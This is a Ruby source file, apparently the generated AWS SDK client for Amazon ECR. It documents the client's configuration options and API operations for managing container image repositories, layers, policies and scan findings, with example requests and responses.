require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/json_rpc.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:ecr)
module Aws::ECR
# An API client for ECR. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::ECR::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :ecr
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::JsonRpc)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentials` or `Aws::ECSCredentials` to
# enable retries and extended timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficient client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :simple_json (false)
# Disables request parameter conversion, validation, and formatting.
# Also disable response data type conversions. This option is useful
# when you want to ensure the highest level of performance by
# avoiding overhead of walking request parameters and response data
# structures.
#
# When `:simple_json` is enabled, the request parameters hash must
# be formatted exactly as the DynamoDB API expects.
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Checks the availability of one or more image layers in a repository.
#
# When an image is pushed to a repository, each image layer is checked
# to verify if it has been uploaded before. If it has been uploaded,
# then the image layer is skipped.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# image layers to check. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that is associated with the image layers to
# check.
#
# @option params [required, Array<String>] :layer_digests
# The digests of the image layers to check.
#
# @return [Types::BatchCheckLayerAvailabilityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchCheckLayerAvailabilityResponse#layers #layers} => Array<Types::Layer>
# * {Types::BatchCheckLayerAvailabilityResponse#failures #failures} => Array<Types::LayerFailure>
#
# @example Request syntax with placeholder values
#
# resp = client.batch_check_layer_availability({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# layer_digests: ["BatchedOperationLayerDigest"], # required
# })
#
# @example Response structure
#
# resp.layers #=> Array
# resp.layers[0].layer_digest #=> String
# resp.layers[0].layer_availability #=> String, one of "AVAILABLE", "UNAVAILABLE"
# resp.layers[0].layer_size #=> Integer
# resp.layers[0].media_type #=> String
# resp.failures #=> Array
# resp.failures[0].layer_digest #=> String
# resp.failures[0].failure_code #=> String, one of "InvalidLayerDigest", "MissingLayerDigest"
# resp.failures[0].failure_reason #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/BatchCheckLayerAvailability AWS API Documentation
#
# @overload batch_check_layer_availability(params = {})
# @param [Hash] params ({})
def batch_check_layer_availability(params = {}, options = {})
req = build_request(:batch_check_layer_availability, params)
req.send_request(options)
end
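# Usage sketch (hypothetical repository name and digest; `stub_responses: true`
# keeps this runnable without AWS credentials, as described in the constructor
# options above):
#
#   ecr = Aws::ECR::Client.new(region: "us-east-1", stub_responses: true)
#   resp = ecr.batch_check_layer_availability(
#     repository_name: "project-a/nginx-web-app",
#     layer_digests: ["sha256:0123456789abcdef"]
#   )
#   resp.layers # => stubbed Array of layer structs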
# Deletes a list of specified images within a repository. Images are
# specified with either an `imageTag` or `imageDigest`.
#
# You can remove a tag from an image by specifying the image's tag in
# your request. When you remove the last tag from an image, the image is
# deleted from your repository.
#
# You can completely delete an image (and all of its tags) by specifying
# the image's digest in your request.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# image to delete. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The repository that contains the image to delete.
#
# @option params [required, Array<Types::ImageIdentifier>] :image_ids
# A list of image ID references that correspond to images to delete. The
# format of the `imageIds` reference is `imageTag=tag` or
# `imageDigest=digest`.
#
# @return [Types::BatchDeleteImageResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchDeleteImageResponse#image_ids #image_ids} => Array<Types::ImageIdentifier>
# * {Types::BatchDeleteImageResponse#failures #failures} => Array<Types::ImageFailure>
#
#
# @example Example: To delete multiple images
#
# # This example deletes images with the tags precise and trusty in a repository called ubuntu in the default registry for
# # an account.
#
# resp = client.batch_delete_image({
# image_ids: [
# {
# image_tag: "precise",
# },
# ],
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# failures: [
# ],
# image_ids: [
# {
# image_digest: "sha256:examplee6d1e504117a17000003d3753086354a38375961f2e665416ef4b1b2f",
# image_tag: "precise",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.batch_delete_image({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [ # required
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# })
#
# @example Response structure
#
# resp.image_ids #=> Array
# resp.image_ids[0].image_digest #=> String
# resp.image_ids[0].image_tag #=> String
# resp.failures #=> Array
# resp.failures[0].image_id.image_digest #=> String
# resp.failures[0].image_id.image_tag #=> String
# resp.failures[0].failure_code #=> String, one of "InvalidImageDigest", "InvalidImageTag", "ImageTagDoesNotMatchDigest", "ImageNotFound", "MissingDigestAndTag", "ImageReferencedByManifestList", "KmsError"
# resp.failures[0].failure_reason #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/BatchDeleteImage AWS API Documentation
#
# @overload batch_delete_image(params = {})
# @param [Hash] params ({})
def batch_delete_image(params = {}, options = {})
req = build_request(:batch_delete_image, params)
req.send_request(options)
end
# Gets detailed information for an image. Images are specified with
# either an `imageTag` or `imageDigest`.
#
# When an image is pulled, the BatchGetImage API is called once to
# retrieve the image manifest.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# images to describe. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The repository that contains the images to describe.
#
# @option params [required, Array<Types::ImageIdentifier>] :image_ids
# A list of image ID references that correspond to images to describe.
# The format of the `imageIds` reference is `imageTag=tag` or
# `imageDigest=digest`.
#
# @option params [Array<String>] :accepted_media_types
# The accepted media types for the request.
#
# Valid values: `application/vnd.docker.distribution.manifest.v1+json`
# \| `application/vnd.docker.distribution.manifest.v2+json` \|
# `application/vnd.oci.image.manifest.v1+json`
#
# @return [Types::BatchGetImageResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchGetImageResponse#images #images} => Array<Types::Image>
# * {Types::BatchGetImageResponse#failures #failures} => Array<Types::ImageFailure>
#
#
# @example Example: To obtain multiple images in a single request
#
# # This example obtains information for an image with a specified image digest ID from the repository named ubuntu in the
# # current account.
#
# resp = client.batch_get_image({
# image_ids: [
# {
# image_tag: "precise",
# },
# ],
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# failures: [
# ],
# images: [
# {
# image_id: {
# image_digest: "sha256:example76bdff6d83a09ba2a818f0d00000063724a9ac3ba5019c56f74ebf42a",
# image_tag: "precise",
# },
# image_manifest: "{\n \"schemaVersion\": 1,\n \"name\": \"ubuntu\",\n \"tag\": \"precise\",\n...",
# registry_id: "244698725403",
# repository_name: "ubuntu",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.batch_get_image({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [ # required
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# accepted_media_types: ["MediaType"],
# })
#
# @example Response structure
#
# resp.images #=> Array
# resp.images[0].registry_id #=> String
# resp.images[0].repository_name #=> String
# resp.images[0].image_id.image_digest #=> String
# resp.images[0].image_id.image_tag #=> String
# resp.images[0].image_manifest #=> String
# resp.images[0].image_manifest_media_type #=> String
# resp.failures #=> Array
# resp.failures[0].image_id.image_digest #=> String
# resp.failures[0].image_id.image_tag #=> String
# resp.failures[0].failure_code #=> String, one of "InvalidImageDigest", "InvalidImageTag", "ImageTagDoesNotMatchDigest", "ImageNotFound", "MissingDigestAndTag", "ImageReferencedByManifestList", "KmsError"
# resp.failures[0].failure_reason #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/BatchGetImage AWS API Documentation
#
# @overload batch_get_image(params = {})
# @param [Hash] params ({})
def batch_get_image(params = {}, options = {})
req = build_request(:batch_get_image, params)
req.send_request(options)
end
# Informs Amazon ECR that the image layer upload has completed for a
# specified registry, repository name, and upload ID. You can optionally
# provide a `sha256` digest of the image layer for data validation
# purposes.
#
# When an image is pushed, the CompleteLayerUpload API is called once
# per each new image layer to verify that the upload has completed.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry to which to upload
# layers. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to associate with the image layer.
#
# @option params [required, String] :upload_id
# The upload ID from a previous InitiateLayerUpload operation to
# associate with the image layer.
#
# @option params [required, Array<String>] :layer_digests
# The `sha256` digest of the image layer.
#
# @return [Types::CompleteLayerUploadResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CompleteLayerUploadResponse#registry_id #registry_id} => String
# * {Types::CompleteLayerUploadResponse#repository_name #repository_name} => String
# * {Types::CompleteLayerUploadResponse#upload_id #upload_id} => String
# * {Types::CompleteLayerUploadResponse#layer_digest #layer_digest} => String
#
# @example Request syntax with placeholder values
#
# resp = client.complete_layer_upload({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# upload_id: "UploadId", # required
# layer_digests: ["LayerDigest"], # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.upload_id #=> String
# resp.layer_digest #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/CompleteLayerUpload AWS API Documentation
#
# @overload complete_layer_upload(params = {})
# @param [Hash] params ({})
def complete_layer_upload(params = {}, options = {})
req = build_request(:complete_layer_upload, params)
req.send_request(options)
end
# Creates a repository. For more information, see [Amazon ECR
# Repositories][1] in the *Amazon Elastic Container Registry User
# Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/Repositories.html
#
# @option params [required, String] :repository_name
# The name to use for the repository. The repository name may be
# specified on its own (such as `nginx-web-app`) or it can be prepended
# with a namespace to group the repository into a category (such as
# `project-a/nginx-web-app`).
#
# @option params [Array<Types::Tag>] :tags
# The metadata that you apply to the repository to help you categorize
#   and organize it. Each tag consists of a key and an optional value,
#   both of which you define. Tag keys can have a maximum length of 128
#   characters, and tag values can have a maximum length of 256
# characters.
#
# @option params [String] :image_tag_mutability
# The tag mutability setting for the repository. If this parameter is
#   omitted, the default setting of `MUTABLE` will be used, which will
#   allow image tags to be overwritten. If `IMMUTABLE` is specified, all
#   image tags within the repository will be immutable, which will prevent
# them from being overwritten.
#
# @option params [Types::ImageScanningConfiguration] :image_scanning_configuration
# The image scanning configuration for the repository. This determines
# whether images are scanned for known vulnerabilities after being
# pushed to the repository.
#
# @option params [Types::EncryptionConfiguration] :encryption_configuration
# The encryption configuration for the repository. This determines how
# the contents of your repository are encrypted at rest.
#
# @return [Types::CreateRepositoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateRepositoryResponse#repository #repository} => Types::Repository
#
#
# @example Example: To create a new repository
#
# # This example creates a repository called nginx-web-app inside the project-a namespace in the default registry for an
# # account.
#
# resp = client.create_repository({
# repository_name: "project-a/nginx-web-app",
# })
#
# resp.to_h outputs the following:
# {
# repository: {
# registry_id: "012345678901",
# repository_arn: "arn:aws:ecr:us-west-2:012345678901:repository/project-a/nginx-web-app",
# repository_name: "project-a/nginx-web-app",
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.create_repository({
# repository_name: "RepositoryName", # required
# tags: [
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# image_tag_mutability: "MUTABLE", # accepts MUTABLE, IMMUTABLE
# image_scanning_configuration: {
# scan_on_push: false,
# },
# encryption_configuration: {
# encryption_type: "AES256", # required, accepts AES256, KMS
# kms_key: "KmsKey",
# },
# })
#
# @example Response structure
#
# resp.repository.repository_arn #=> String
# resp.repository.registry_id #=> String
# resp.repository.repository_name #=> String
# resp.repository.repository_uri #=> String
# resp.repository.created_at #=> Time
# resp.repository.image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
# resp.repository.image_scanning_configuration.scan_on_push #=> Boolean
# resp.repository.encryption_configuration.encryption_type #=> String, one of "AES256", "KMS"
# resp.repository.encryption_configuration.kms_key #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/CreateRepository AWS API Documentation
#
# @overload create_repository(params = {})
# @param [Hash] params ({})
def create_repository(params = {}, options = {})
req = build_request(:create_repository, params)
req.send_request(options)
end
# Deletes the lifecycle policy associated with the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository.
#
# @return [Types::DeleteLifecyclePolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteLifecyclePolicyResponse#registry_id #registry_id} => String
# * {Types::DeleteLifecyclePolicyResponse#repository_name #repository_name} => String
# * {Types::DeleteLifecyclePolicyResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::DeleteLifecyclePolicyResponse#last_evaluated_at #last_evaluated_at} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.delete_lifecycle_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.last_evaluated_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteLifecyclePolicy AWS API Documentation
#
# @overload delete_lifecycle_policy(params = {})
# @param [Hash] params ({})
def delete_lifecycle_policy(params = {}, options = {})
req = build_request(:delete_lifecycle_policy, params)
req.send_request(options)
end
# Deletes the registry permissions policy.
#
# @return [Types::DeleteRegistryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteRegistryPolicyResponse#registry_id #registry_id} => String
# * {Types::DeleteRegistryPolicyResponse#policy_text #policy_text} => String
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteRegistryPolicy AWS API Documentation
#
# @overload delete_registry_policy(params = {})
# @param [Hash] params ({})
def delete_registry_policy(params = {}, options = {})
req = build_request(:delete_registry_policy, params)
req.send_request(options)
end
# Deletes a repository. If the repository contains images, you must
# either delete all images in the repository or use the `force` option
# to delete the repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository to delete. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to delete.
#
# @option params [Boolean] :force
#   If a repository contains images, this parameter forces the deletion.
#
# @return [Types::DeleteRepositoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteRepositoryResponse#repository #repository} => Types::Repository
#
#
# @example Example: To force delete a repository
#
# # This example force deletes a repository named ubuntu in the default registry for an account. The force parameter is
# # required if the repository contains images.
#
# resp = client.delete_repository({
# force: true,
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# repository: {
# registry_id: "012345678901",
# repository_arn: "arn:aws:ecr:us-west-2:012345678901:repository/ubuntu",
# repository_name: "ubuntu",
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.delete_repository({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# force: false,
# })
#
# @example Response structure
#
# resp.repository.repository_arn #=> String
# resp.repository.registry_id #=> String
# resp.repository.repository_name #=> String
# resp.repository.repository_uri #=> String
# resp.repository.created_at #=> Time
# resp.repository.image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
# resp.repository.image_scanning_configuration.scan_on_push #=> Boolean
# resp.repository.encryption_configuration.encryption_type #=> String, one of "AES256", "KMS"
# resp.repository.encryption_configuration.kms_key #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteRepository AWS API Documentation
#
# @overload delete_repository(params = {})
# @param [Hash] params ({})
def delete_repository(params = {}, options = {})
req = build_request(:delete_repository, params)
req.send_request(options)
end
# Deletes the repository policy associated with the specified
# repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository policy to delete. If you do not specify a registry, the
# default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that is associated with the repository
# policy to delete.
#
# @return [Types::DeleteRepositoryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteRepositoryPolicyResponse#registry_id #registry_id} => String
# * {Types::DeleteRepositoryPolicyResponse#repository_name #repository_name} => String
# * {Types::DeleteRepositoryPolicyResponse#policy_text #policy_text} => String
#
#
# @example Example: To delete the policy associated with a repository
#
# # This example deletes the policy associated with the repository named ubuntu in the current account.
#
# resp = client.delete_repository_policy({
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# policy_text: "{ ... }",
# registry_id: "012345678901",
# repository_name: "ubuntu",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.delete_repository_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DeleteRepositoryPolicy AWS API Documentation
#
# @overload delete_repository_policy(params = {})
# @param [Hash] params ({})
def delete_repository_policy(params = {}, options = {})
req = build_request(:delete_repository_policy, params)
req.send_request(options)
end
# Returns the scan findings for the specified image.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
#   repository in which to describe the image scan findings. If you do
# not specify a registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The repository for the image for which to describe the scan findings.
#
# @option params [required, Types::ImageIdentifier] :image_id
# An object with identifying information for an Amazon ECR image.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `DescribeImageScanFindings` request where `maxResults` was used and
# the results exceeded the value of that parameter. Pagination continues
# from the end of the previous results that returned the `nextToken`
# value. This value is null when there are no more results to return.
#
# @option params [Integer] :max_results
# The maximum number of image scan results returned by
# `DescribeImageScanFindings` in paginated output. When this parameter
# is used, `DescribeImageScanFindings` only returns `maxResults` results
# in a single page along with a `nextToken` response element. The
# remaining results of the initial request can be seen by sending
# another `DescribeImageScanFindings` request with the returned
# `nextToken` value. This value can be between 1 and 1000. If this
# parameter is not used, then `DescribeImageScanFindings` returns up to
# 100 results and a `nextToken` value, if applicable.
#
# @return [Types::DescribeImageScanFindingsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeImageScanFindingsResponse#registry_id #registry_id} => String
# * {Types::DescribeImageScanFindingsResponse#repository_name #repository_name} => String
# * {Types::DescribeImageScanFindingsResponse#image_id #image_id} => Types::ImageIdentifier
# * {Types::DescribeImageScanFindingsResponse#image_scan_status #image_scan_status} => Types::ImageScanStatus
# * {Types::DescribeImageScanFindingsResponse#image_scan_findings #image_scan_findings} => Types::ImageScanFindings
# * {Types::DescribeImageScanFindingsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.describe_image_scan_findings({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_id: { # required
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# next_token: "NextToken",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_id.image_digest #=> String
# resp.image_id.image_tag #=> String
